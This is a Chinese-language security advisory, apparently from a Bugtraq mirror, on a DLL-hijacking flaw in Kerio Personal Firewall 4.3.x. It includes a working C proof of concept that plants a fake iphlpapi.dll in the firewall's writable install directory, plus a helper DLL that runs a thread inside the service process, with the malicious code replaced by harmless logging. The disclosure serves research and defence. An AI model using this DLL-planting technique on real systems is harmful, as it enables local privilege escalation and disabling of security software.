发布日期：2007-01-04
更新日期：2007-01-04

受影响系统：

Kerio Personal Firewall 4.3.268
Kerio Personal Firewall 4.3.246

描述：

---

BUGTRAQ  ID: 21828

Kerio Personal Firewall是一款个人桌面系统防火墙。

Kerio Personal Firewall处理程序相关组件的加载时存在漏洞，本地攻击者可能利用此漏洞提升权限或使防火墙失效。

Kerio Personal Firewall在加载相关的库文件iphlpapi.dll时，首先从软件的安装目录搜索，如果搜索不到才从操作系统目录加载，而且软件的安装目录是可写的，本地攻击者可以创建伪造的DLL文件，防火墙服务在初始化时加载执行其中的代码，导致执行攻击者的任意指令。

<*来源：Matousec （http://www.matousec.com/）
  
  链接：http://www.matousec.com/info/advisories/Kerio-Fake-iphlpapi-DLL-injection.php
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/*

Testing program for Fake 'iphlpapi' DLL injection (BTP00002P001SK)


Usage:
prog INSTPATH
   INSTPATH - Kerio installation directory

Description:
This program demonstrates the possibility of installation of a fake "iphlpapi.dll" to Kerio processes.
The exploitation of this vulnerability is inconspicuous for common user even if the fake DLL does not simulate
the functionality of original "iphlpapi.dll". Helper library called "testdll.dll" is copied to the installation directory
of Kerio and renamed to "iphlpapi.dll". Because Kerio loads this DLL dynamically using LoadLibrary API and does
not check the origin of the loaded module, it loads our library instead of the original "iphlpapi.dll" during its startup.
When "testdll.dll" is loaded, it creates extra thread that can execute a malicious code. In this demostration
the malicious code is simulated by a harmless code that logs messages to a file.

Test:
Running the testing program and system reboot.

*/

#include <stdio.h>
#include <windows.h>


void about(void)
{
  printf("Testing program for Fake 'iphlpapi' DLL injection (BTP00002P001SK)\n");
  printf("Windows Personal Firewall analysis project\n");
  printf("Copyright 2007 by Matousec - Transparent security\n");
  printf("http://www.matousec.com/""\n\n");
  return;
}

void usage(void)
{
  printf("Usage: test INSTPATH\n"
         "  INSTPATH - Kerio installation directory\n");
  return;
}

void print_last_error()
{
  LPTSTR buf;
  DWORD code=GetLastError();
  if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,code,0,(LPTSTR)&buf,0,NULL))
  {
    fprintf(stderr,"Error code: %ld\n",code);
    fprintf(stderr,"Error message: %s",buf);
    LocalFree(buf);
  } else fprintf(stderr,"Unable to format error message for code %ld.\n",code);
  return;
}


int main(int argc,char **argv)
{
  about();

  if (argc!=2)
  {
    usage();
    return 1;
  }

  char testdll_new[MAX_PATH];
  snprintf(testdll_new,MAX_PATH,"%s\\iphlpapi.dll",argv[1]);

  if (CopyFile("testdll.dll",testdll_new,FALSE))
  {
    printf("\"testdll.dll\" copied to \"%s\".\n",testdll_new);
    printf("\nTEST SUCCESSFUL!\n");
    return 0;
  }

  fprintf(stderr,"Unable to copy \"testdll.dll\" to \"%s\".\n",testdll_new);
  print_last_error();
  printf("\nTEST FAILED!\n");
  return 1;
}


/*

Helper DLL for Fake 'iphlpapi' DLL injection (BTP00002P001SK)

Description:
This DLL creates a new thread that can be used for executing malicious code. The malicious code is simulated
by a harmless code that logs messages to a file.

*/

#include <stdio.h>
#include <windows.h>

HANDLE thread=NULL;
char msg[1024];

void logmsg();

/*
logmsg logs messages to C:\BTP00002P001SK.log
*/

void logmsg(void)
{
  HANDLE log=CreateFile("C:\\BTP00002P001SK.log",GENERIC_WRITE,0,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
  if (log!=INVALID_HANDLE_VALUE)
  {
    SetFilePointer(log,0,NULL,FILE_END);
    DWORD bytes;
    WriteFile(log,msg,strlen(msg),&bytes,NULL);
    CloseHandle(log);
  }
  return;
}


/*
thread routine that can execute malicious code with the privileges of vsmon.exe
*/

DWORD WINAPI thread_proc(HMODULE module)
{
  while (1)
  {
    snprintf(msg,1024,"Any code can be executed now in process PID=%ld, using module at 0x%p.\n",
             GetCurrentProcessId(),module);
    logmsg();
    Sleep(10000);
  }

  return 0;
}


BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved)
{
  if (fdwReason==DLL_PROCESS_ATTACH)
  {
    DisableThreadLibraryCalls(hinstDLL);

    snprintf(msg,1024,"DLL_PROCESS_ATTACH for testdll.dll in process PID=%ld, hinstDLL = 0x%p\n",GetCurrentProcessId(),hinstDLL);
    logmsg();
    thread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)thread_proc,hinstDLL,0,NULL);
  }

  if ((fdwReason==DLL_PROCESS_DETACH) && thread)
  {
    snprintf(msg,1024,"DLL_PROCESS_DETACH for testdll.dll in process PID=%ld, hinstDLL = 0x%p\n",GetCurrentProcessId(),hinstDLL);
    logmsg();
    TerminateThread(thread,0);
    CloseHandle(thread);
  }

  return TRUE;
}

建议：

---

厂商补丁：

Kerio
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.kerio.com/

浏览次数：3535
严重程度：0（网友投票）